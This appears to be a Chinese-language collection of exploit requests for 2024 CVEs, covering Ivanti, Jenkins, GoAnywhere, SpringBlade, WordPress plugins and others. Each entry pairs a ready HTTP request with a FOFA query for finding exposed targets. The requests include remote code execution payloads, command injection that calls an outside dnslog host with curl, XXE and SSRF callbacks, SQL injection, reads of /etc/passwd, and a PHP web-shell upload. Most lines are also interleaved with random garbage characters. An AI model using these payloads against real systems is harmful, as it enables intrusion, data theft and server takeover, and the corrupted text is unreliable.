POST /function/save HTTP/1.1
5 Z- o9 s# s! H( U( dHost: 192.168.40.130:8088
4 G" e- M0 q* Z9 x$ |2 D# ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* n0 D1 p. f [/ h5 n" y7 U6 dConnection: close% O* Q/ B2 m$ Q$ f' k% X
Content-Length: 121
" z/ b, h' c/ P) m8 yAccept: */*) j# Z6 p0 N5 }. F/ Y1 R0 l
Accept-Encoding: gzip, deflate) b% J0 b$ L8 a \6 h# y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ E& Z `: o' p& ^1 MContent-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X) ^, c) s! x( w s% W& fX-Requested-With: XMLHttpRequest: @1 d! @: `# }+ y( o' V$ M
9 N& ]" `! i9 ?, z
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B! r! L" x+ ^5 M B0 {
0 U( ?4 d# K; _6 Y1 [. n' c/ l, F2 d) b% i0 [
99. Ncast盈可视高清智能录播系统busiFacade RCE
?: H& b& x' v5 k$ b9 H4 Z! CCVE-2024-03055 b! _ R) a K/ j! K
FOFA:app="Ncast-产品" && title=="高清智能录播系统" i- P$ z3 K2 @* R5 v
POST /classes/common/busiFacade.php HTTP/1.1" d( W% i- F2 D
Host: 192.168.40.130:8080- J9 q$ p6 L* T9 \, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& Q% ]: N+ }- g
Connection: close2 Z5 d, j t& C$ {% q
Content-Length: 1540 c {3 }( P* _3 z% V
Accept: */*
; }+ j( W) B& g8 \( j; IAccept-Encoding: gzip, deflate6 H r6 |: }" J+ @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 `; d5 A% a: q& }" [$ O
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
& p Z/ o3 ~ l4 ]+ d* n xX-Requested-With: XMLHttpRequest L2 E' @/ n3 }6 k0 J4 g
2 b! `( A9 A8 S( M5 R x$ _%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D( @. `" S& r3 m7 |! I% p
/ o( H" r8 ^$ G6 G. F5 y3 `4 D( G$ ` ~3 f7 W
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传; {+ c$ F2 |* |' A
CVE-2024-0352
4 s; e% e& s" p, M5 T Y0 u1 q* LFOFA:icon_hash="874152924"2 E, @5 ~6 a9 D
POST /api/file/formimage HTTP/1.1( _0 K/ j% h9 k. X: Z. L
Host: 192.168.40.130/ y) i$ ~5 l9 w# B
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36: Q( r3 Y1 ?! Q9 D. V) v S
Connection: close
1 m& S( [/ O: ]9 x ?5 wContent-Length: 201! C7 d, A) h* {) ~: o* R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei. `4 R p; G$ Z; k' X* H0 b& l
Accept-Encoding: gzip
_! d! Y$ d, d: W0 ?- B( b7 m7 W/ `( e" Y r; K6 P W# v. B
------WebKitFormBoundarygcflwtei# Z: E5 m' r; j- Z C
Content-Disposition: form-data; name="file";filename="IE4MGP.php"0 Q5 E- D# b; } p& o
Content-Type: application/x-php
) w& S6 s3 |' W, [* w* L: H3 ]* S. c: Q; q) v' `! X: s9 X
2ayyhRXiAsKXL8olvF5s4qqyI2O
7 r1 U1 H, c% z0 j' w0 z' G8 n8 Q4 p------WebKitFormBoundarygcflwtei--
- B2 C5 n! o% x. B. S- _! K, q" z0 N: P: r( n7 H5 `8 A
+ @6 [! P" Z, ]* V! D( v) f! f
101. ivanti policy secure-22.6命令注入9 h" S3 P" }! t; ?4 W, d k ~2 _3 P
CVE-2024-21887
# {5 P% |, q! GFOFA:body="welcome.cgi?p=logo"0 H3 U( J. ] a$ \3 p0 k) K8 C
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.17 I2 \, n4 p7 l: x! x
Host: x.x.x.xx.x.x.x
1 H' k, T. ~3 I' YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- @3 T2 {5 `9 }" M
Connection: close
; E: W: K8 d. s: x5 GAccept-Encoding: gzip
" v' \* Z) h# e4 A; o8 c& j0 l0 Z2 y& n
& r9 S7 q) v* C. I102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
2 b7 \2 A. e$ a, i8 j7 O& f. A9 lCVE-2024-21893
7 O# Y/ R, Y' z9 q9 BFOFA:body="welcome.cgi?p=logo"
3 U/ m2 }' q4 q7 |. E+ o xPOST /dana-ws/saml20.ws HTTP/1.1
; G% ?/ Q+ \0 G. @: d7 N, dHost: x.x.x.x7 ?4 Z' J1 A0 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 o$ y' ~* `6 w, E( aConnection: close
- O6 R$ d$ _- ~0 S& ^! RContent-Length: 792 a0 B( ]5 Y3 U: X/ X9 N
Accept-Encoding: gzip
- N0 v. k( w9 j( y$ ]+ a
; J0 c, |2 [" [; y2 c2 D0 }+ `<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
% m8 |- Z$ B2 V; C/ p& s( f
; A' ~0 ^2 d% _3 @2 P" k/ H( E103. Ivanti Pulse Connect Secure VPN XXE
- E$ S: V4 ]' I- I! rCVE-2024-220243 S6 H7 O/ @! n' g3 z9 k
FOFA:body="welcome.cgi?p=logo"$ r1 s/ D; e# b/ |* V
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
U8 b( s( k' o) Y! n8 M3 UHost: 192.168.40.130:111; l9 k& F9 O# w) K# Z
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
/ K% A. Z( m, v9 d7 V7 J* |& hConnection: close0 ?. r. n7 _* H
Content-Length: 2041 q4 B4 D& ]$ M& N
Content-Type: application/x-www-form-urlencoded" i1 D2 ~; X# l) r2 g& B, f
Accept-Encoding: gzip
! w: [1 ~! A3 B5 u
! O% u0 F- X! sSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
5 [$ d# l4 e d& A, \( s: z- I( y! z+ H; h
# s) Q) {& t$ ?其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
; M1 ?& c- p7 u+ g+ t1 V" n ]<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>+ O5 @& @$ T5 Z* ~% t
8 h, W- r( y: J" ?# i! A0 Q: U8 N. G/ k @
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
5 D1 _; _% M- HCVE-2024-0569& J" @* s, f; |' \
FOFA:title="TOTOLINK"
* u; m4 j: ~, G8 kPOST /cgi-bin/cstecgi.cgi HTTP/1.1
" t& R" o! @+ W1 VHost:192.168.0.1
; y/ d: C5 F; z' O/ hContent-Length:41
1 p e% M8 `- \Accept:application/json,text/javascript,*/*;q=0.01* `+ V9 T2 u8 v% a. A
X-Requested-with: XMLHttpRequest) _& h7 t+ J/ k. ]3 r7 m
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
) \1 w3 k9 S- R3 h2 c9 \! ]6 MContent-Type: application/x-www-form-urlencoded:charset=UTF-8
4 o! I2 H' w; l: X/ ?# y# Y$ e# OOrigin: http://192.168.0.1
$ p% E) D) Y+ p; B; G0 ~ ZReferer: http://192.168.0.1/advance/index.html?time=1671152380564+ j9 q! d5 ]# B% s
Accept-Encoding:gzip,deflate4 d T' c, t$ y8 e9 `* o5 _
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
# p" m5 e, q+ oConnection:close7 b' @& K" s2 l
$ Y" h. D3 w8 v# u6 O( A* P
{: O7 r( ]. w. m
"topicurl":"getSysStatusCfg",
, Q* K# c0 |: C/ o9 i' U) S"token":""
) C/ [; e$ X1 L: K4 W}& `5 G: q6 x* W/ t' q) }, o, {5 m8 \! A
/ r$ `" \& x1 v# }8 {105. SpringBlade v3.2.0 export-user SQL 注入
3 `1 X- E) M) M2 Q1 ?8 V# ]FOFA:body="https://bladex.vip"
) l( P. o6 N: Q: y+ ?http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
K5 D" T% ]/ a+ { {6 d9 i7 s
* q3 w4 e* S4 K- }& {106. SpringBlade dict-biz/list SQL 注入
7 G$ R5 f4 s6 X1 @FOFA:body="Saber 将不能正常工作"
6 w7 A, ~- y) |3 h5 T( \GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
( G+ g; J2 q3 Q% o6 L3 U5 R3 M" }Host: your-ip8 Z# k* t1 O( Q# v( v, T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 N- V6 B( g7 |
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A+ |/ d9 }; l' X) k: r6 a3 J3 @& |# J* V
Accept-Encoding: gzip, deflate
- K) c" R) k1 h$ CAccept-Language: zh-CN,zh;q=0.9) V) j2 u$ H/ z. M! n1 t! k U4 |
Connection: close* K% z8 P5 P/ }, |. ]6 y
/ j7 U9 l3 q2 F$ v
: l6 X+ r! K1 y. d; q
107. SpringBlade tenant/list SQL 注入9 p( h! e- H$ B" f
FOFA:body="https://bladex.vip"# L% }9 Z( T& d
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
3 T4 V5 |2 c* W& m( |$ `* lHost: your-ip
5 R/ a) H- c, b% RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( J% b# |$ }) Q2 ?Blade-Auth:替换为自己的
8 F( J: ]. ]) k3 r2 O" QConnection: close
; _3 L$ o2 d% Q' ~+ R- j) E% O1 n, y
7 @, z3 `% S' ]( F$ f
108. D-Tale 3.9.0 SSRF7 S9 w: m9 G% ?- p3 z
CVE-2024-21642! ]' T$ S2 E" k8 z& ~
FOFA:"dtale/static/images/favicon.png"
) [! W5 F2 a# _* S/ pGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1( B* |. v# A: r' I3 q
Host: your-ip& Z) I7 o* \+ `7 u) o3 X! i
Accept: application/json, text/plain, */*
9 I! H: A4 z" c6 E& m/ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 x0 c/ g- v3 G2 g, r E. T
Accept-Encoding: gzip, deflate
/ X4 E- K0 g2 g# [5 q# IAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
, u9 K+ R& b- a; n: n/ u wConnection: close
+ ~( K* \" g' |8 i& y, y: D: S5 j+ ]- a, j% h5 d: z8 N' Q
9 [7 Z- q. O& p1 a
109. Jenkins CLI 任意文件读取" m5 v/ |4 v4 |5 c+ r- j# `! [) w
CVE-2024-23897
1 X8 ~* P8 _' ^FOFA:header="X-Jenkins"% ^" W& C5 r5 n3 |, _
POST /cli?remoting=false HTTP/1.1
' }0 i) `4 l% W1 a0 cHost:
9 b! ]9 Q9 H) r5 W% RContent-type: application/octet-stream
. S0 |+ O* V) p% RSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
5 E0 y& _" z5 r4 ^Side: upload! k) N0 Z5 u; i# j& c: b& A- A
Connection: keep-alive( x9 ?" M. Y% p
Content-Length: 163
1 ?# b' Y8 q5 A
" G5 e% H9 g5 e6 \1 Ib'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
8 K9 w* l5 m' K; O/ N# |* i' Z9 q
: @0 b2 r5 K. |9 _: N
POST /cli?remoting=false HTTP/1.1
+ w, V3 Q1 h$ X! ^/ A* p' r. AHost:
* T6 D! U, V/ J% W7 L- [; ]7 G8 ?- PSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
* B% ^2 a8 n7 o1 {( U6 l$ ]4 p* d; Adownload) g$ E$ a' I5 ~4 R) i
Content-Type: application/x-www-form-urlencoded
0 \3 g9 K; H) ]- B$ W( qContent-Length: 0
8 Q2 ?7 L7 H; v! |, p0 L3 }3 k/ o s2 M5 l& b: h
: E s [' I1 c/ gERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin* |+ f4 o6 U0 E5 y
java -jar jenkins-cli.jar help S$ w2 @( l6 p$ ?5 g% S' L
[COMMAND]
! f/ s) y# x2 A/ J2 a+ g2 ]/ [- j7 {Lists all the available commands or a detailed description of single command./ V! L- [$ ~/ N L
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
( c; H: x9 U3 v3 [
+ L" x$ D1 Z1 O, j
; [4 }' X7 j9 l110. Goanywhere MFT 未授权创建管理员) k, D1 A8 f$ Q1 K
CVE-2024-0204
4 A5 M5 y3 f/ S# w4 Y5 @3 W: wFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"* ?- \/ T* K% L4 M! N
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
, f# C8 i' A1 L6 @- eHost: 192.168.40.130:8000+ m& _6 V2 _7 w# L+ P( ~
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
$ r7 z" P; T- d& O2 sConnection: close4 H3 ~ @7 B8 z" P5 a
Accept: */*
# L+ I6 X" w5 E0 }% g# ZAccept-Language: en) Y2 |0 J4 J. ^7 w0 h
Accept-Encoding: gzip
5 |/ r7 e5 B9 {0 h1 u1 v2 g7 ~" a$ g8 g6 K
, G, D" J9 F* d+ y0 X) {
111. WordPress Plugin HTML5 Video Player SQL注入$ O# j9 B+ y, X' P9 n" J7 `
CVE-2024-1061
4 \3 T% \7 b1 zFOFA:"wordpress" && body="html5-video-player"
$ T5 C/ i3 Z4 W* Z1 v/ pGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
# p% v$ A& G3 y# @. F# lHost: 192.168.40.130:112
( a" ^: g; m6 w% D% S) s. pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* Q1 Z1 L6 K. L8 OConnection: close
+ Q: O# A9 C: W7 V, CAccept: */* g9 t8 V& }* e; F y; F# ^
Accept-Language: en/ K m! X. Y+ O) h G5 [( i
Accept-Encoding: gzip* t: e- E4 O/ e% r
6 u& O( [: Z4 Y9 @8 T" L, W# W
4 K3 G, {- }2 ^, ]2 q
112. WordPress Plugin NotificationX SQL 注入
2 ]5 }; {. ~; j" ]- PCVE-2024-16984 V1 A# x. u1 r0 v4 @
FOFA:body="/wp-content/plugins/notificationx"" p5 Y, Q* N5 b; q4 s" v2 b" m
POST /wp-json/notificationx/v1/analytics HTTP/1.1- N. {; P8 [2 Y: X X7 Q2 m6 |
Host: {{Hostname}}5 E; i' P1 t0 _$ G- b) _: ]% M
Content-Type: application/json
$ W6 K4 X; [" h* _* ^# l: T
! Y+ b8 s) P; N% r' I{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
; C, q/ e! z" [0 q L$ l5 p7 `% Y' y4 W# J; b
2 `1 d/ @3 ]+ w8 I! g113. WordPress Automatic 插件任意文件下载和SSRF
' x! w# X: m; ^$ o% nCVE-2024-279545 B1 r+ M9 Q3 c5 k; _/ g
FOFA:"/wp-content/plugins/wp-automatic"
- \4 F, ]4 z+ J `6 yGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1( x- x; |* y9 w3 q, Y
Host: x.x.x.x
% G2 ?* T- f" A' `5 X- xUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
1 y5 V$ k7 N- r+ v; gConnection: close
+ H) b5 ]2 D+ t) @' o6 f, i, o( |1 J/ U$ JAccept: */*( F) G' w" {. i7 L, s/ B$ o+ b
Accept-Language: en. C) D9 u& y9 x
Accept-Encoding: gzip' N/ t- ]' E' N8 Q* c
5 m7 J3 P4 l8 F) ^
# Q5 j! G! J, A9 R: _" l114. WordPress MasterStudy LMS插件 SQL注入% X C: @. ]0 b' M8 r4 z) u
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"# O7 I$ W! O# R4 b8 i
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
1 T3 j2 c6 f, C; d3 v5 YHost: your-ip; @4 n$ ^! l' L$ {, D* P" h' \4 ^* w
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
* J6 z! h& G% S T4 GAccept-Charset: utf-87 v! {6 C+ Y- U5 O
Accept-Encoding: gzip, deflate8 j7 H. X. ]. m8 `% H! A
Connection: close
u" T. M' W9 ]2 B- X v% b4 Y w" k9 C9 P; j' | U
- A7 P3 L/ R# a; h, I4 }115. WordPress Bricks Builder <= 1.9.6 RCE, ~; \: t8 {4 q3 v9 p4 Q7 o4 r& G
CVE-2024-25600$ d% V# _8 P% T
FOFA: body="/wp-content/themes/bricks/"3 r w5 s5 c9 l
第一步,获取网站的nonce值' k6 N, h3 K+ i
GET / HTTP/1.1
$ {7 f; z' P. f! ~2 CHost: x.x.x.x: H2 n+ n: c: W- A
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
' u& e) H8 `) lConnection: close
8 @9 a; I( C1 m6 U$ SAccept-Encoding: gzip) k$ ?2 J; F. k4 }3 M
/ i% t x1 J( Q! h$ a6 w' ^) \4 `- j; ~
第二步替换nonce值,执行命令/ ?) J3 I5 t3 C# F/ M
POST /wp-json/bricks/v1/render_element HTTP/1.1
) s) O' b }2 d- d7 {! n: uHost: x.x.x.x {8 O9 @: ]6 D7 E9 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
; B8 C( m, M, m) i! w% R8 R7 T4 uConnection: close
' R# U% |* }; @ l1 N4 T/ BContent-Length: 356' y$ | T" W* X% s7 p6 N& F5 D( a
Content-Type: application/json5 T4 G( c- G# `& }* s1 _8 }
Accept-Encoding: gzip
7 g' Z( E3 S. J! S M6 `7 {# u, R% {, _3 {
{* N6 m' R+ ?: U+ g C
"postId": "1",
" c$ {" f6 l/ |7 \7 ]: E7 x "nonce": "第一步获得的值",1 h/ j1 l% J+ i& o: |
"element": {. W% b5 F7 _5 ]/ Y7 n- r0 V
"name": "container",
- A+ M7 a, O6 q) Y8 s/ V. I# e; ^; \ "settings": {
; C \8 {8 O9 k% I4 W' x: u "hasLoop": "true",
, p- Y; [. K- m8 f# D/ N2 l m "query": {
/ _/ O: C) y( Y( y+ [ "useQueryEditor": true,
$ P7 \( b1 y) `; g "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",: G7 b1 Q& D) l& y+ A
"objectType": "post". {% K" X. n: v# G
}; R! {8 k2 U4 W3 k. X* w
}# |/ \8 A I+ w& A5 p
}
( s6 R) Y& d$ J$ a- {}
0 M# s1 L& g! l/ F; {
/ S) V% L# E- a. o3 K5 _5 y$ Z. u- `- X; S6 k+ U
116. wordpress js-support-ticket文件上传3 Y! x e' o7 S8 F" P& V) ~% S: G
FOFA:body="wp-content/plugins/js-support-ticket"
4 r5 G0 u4 L; k7 O8 c; S( r! `POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1: h8 T7 v7 E6 r8 X5 p% O, T
Host: I& y; M1 A+ A+ ^ Q% z" c, v
Content-Type: multipart/form-data; boundary=--------7670991714 p4 r3 \; K# t% F+ F
User-Agent: Mozilla/5.0% H: q9 d! W m3 o: O( R. b+ W
5 K; g: r( G# B8 z3 `1 H----------767099171" G$ @, X; ], y" c8 [: P
Content-Disposition: form-data; name="action"
3 a. O0 @/ l! a6 Cconfiguration_saveconfiguration
1 }% y6 j% R2 V0 f B" a! r/ Y----------7670991712 V0 q; m* V3 W/ G2 E
Content-Disposition: form-data; name="form_request"4 w- N" t( Y. R8 u1 K" J% ]& z
jssupportticket. ~) X k" B& V1 I. X2 r+ c& q
----------7670991713 i3 P" E1 ]5 G& B
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
9 s) B J/ N P+ Y F6 F" @* ZContent-Type: image/png \! o4 v& q: X3 y
----------767099171--7 Q/ m. U2 z% {8 n( y; ?% C! y
; M7 ^* Z5 f9 D/ w9 Z& T; w
, h) E- R. M1 Z; }5 C- X9 L
117. WordPress LayerSlider插件SQL注入
- e& H0 H; {2 i) _: q- _" ]$ E+ fversion:7.9.11 – 7.10.0( b" v! L1 @' M: O" _
FOFA:body="/wp-content/plugins/LayerSlider/"
9 E' Y M O, G; J" c: U6 P' UGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
+ ?" V! ?3 T. M/ ?Host: your-ip
, c" B5 a) t3 p: eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( `' C) `* j* t' H4 }! c# UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ ]6 C6 C% V$ U R7 `1 `; `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 ^) U/ s" L/ g& q+ f+ y
Accept-Encoding: gzip, deflate, br
+ {; K9 K; K5 G5 V# x0 D! C, M4 }Connection: close* R+ U: F( A+ i5 z h( j$ Q
Upgrade-Insecure-Requests: 1
8 Y; u0 t( c7 P& X& L9 P+ _
1 }# ]9 ]- c+ [, }
; i- p# P! H3 g+ d118. 北京百绰智能S210管理平台uploadfile.php任意文件上传/ b: W/ c; f- x2 S+ @2 i
CVE-2024-09390 D' G* ?' \ q; P( }7 I
FOFA:title="Smart管理平台"' W. e5 c$ U+ I e" K, m' P; F! ^
POST /Tool/uploadfile.php? HTTP/1.1; L9 E: `2 M# @8 R+ w8 q
Host: 192.168.40.130:84439 ` H/ v" j, B2 Z9 H1 `# u
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8/ z" u1 @+ h5 g" H: l. e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0- G. O7 B1 b( G1 t( c& L# x, o6 S+ a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 }1 }& E4 _+ z1 E9 ?( J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ S% g$ z9 y: N3 M6 L" DAccept-Encoding: gzip, deflate% E7 c& ^% T( ^7 t- o6 E) ^
Content-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828870 ^4 P! c$ a6 T: p: G) a; B
Content-Length: 405
% C9 J2 ]: p" P+ h5 HOrigin: https://192.168.40.130:8443+ D. B5 S |7 h& |8 D" v
Referer: https://192.168.40.130:8443/Tool/uploadfile.php5 o6 k1 b, P' G2 R' V4 j9 G
Upgrade-Insecure-Requests: 13 G# y' F3 m& ~" Q+ `) }- `0 R
Sec-Fetch-Dest: document
0 f+ o, A( ] q8 {$ @) ]5 FSec-Fetch-Mode: navigate
; [2 `2 b$ e2 F0 z! H" nSec-Fetch-Site: same-origin
* x u* n* y, E( ^2 k) _Sec-Fetch-User: ?17 F- E5 D3 _$ z3 i
Te: trailers
: i/ S( e7 `, u$ t* W6 @" jConnection: close( T Y# }! H+ W
7 U' V5 X- w+ @-----------------------------13979701222747646634037182887
% U1 R8 S. N4 G1 `% o3 D9 ~9 VContent-Disposition: form-data; name="file_upload"; filename="contents.php"+ w& k1 S6 n- _1 f+ K6 x
Content-Type: application/octet-stream
1 b. ^3 I1 G- O2 x3 N7 s' m& P/ G# H( n$ ~ Z) i" D% T
<?php4 I0 i# P" b# i2 Z6 z- {0 [8 ~" B" E
system($_POST["passwd"]);
2 a) w u* D. y& G0 ]$ X?>' Q4 I% ]' H+ a/ Z6 V
-----------------------------13979701222747646634037182887
) w3 Z K s9 ?( e+ \) o2 o/ yContent-Disposition: form-data; name="txt_path"" J {( H8 x9 O, y2 R
+ I9 d+ Y- y, z) W6 W9 ~/home/src.php- _! v( V9 U7 [6 |8 `+ L- Y) L3 O
-----------------------------13979701222747646634037182887--# |1 u( | N5 E N) w/ m9 y
& o# U$ f3 M/ ~9 T& h4 P U
1 S& I3 M4 N! U& t) h0 t访问/home/src.php7 k' D2 ^9 y% Y0 s6 I
) m" `& p/ ` S- L
119. 北京百绰智能S20后台sysmanageajax.php sql注入
9 C' }& ?7 s* ]3 o R; ?CVE-2024-12544 y2 f! p* l* @; r; T% N8 K
FOFA:title="Smart管理平台"+ h% N& I5 C {0 I( o# v. `
先登录进入系统,默认账号密码为admin/admin
$ k, l, u* C2 E2 P2 QPOST /sysmanage/sysmanageajax.php HTTP/1.11' x3 f h. o, B
Host: x.x.x.x1 v$ I1 |4 X# B
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
C; P% A% ~9 m0 J6 s9 ], aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.04 F8 V+ B& q' B, R) v
Accept: */*
! e: N7 P/ [. N. |+ b. P$ P# gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( d2 |2 q" v1 [
Accept-Encoding: gzip, deflate
+ f; X1 @% ~! J9 |& q% OContent-Type: application/x-www-form-urlencoded;' H0 x5 j" m1 z/ L" W
Content-Length: 1097 |& |1 D9 t8 {) }! l5 C' N7 r2 O4 |
Origin: https://58.18.133.60:8443
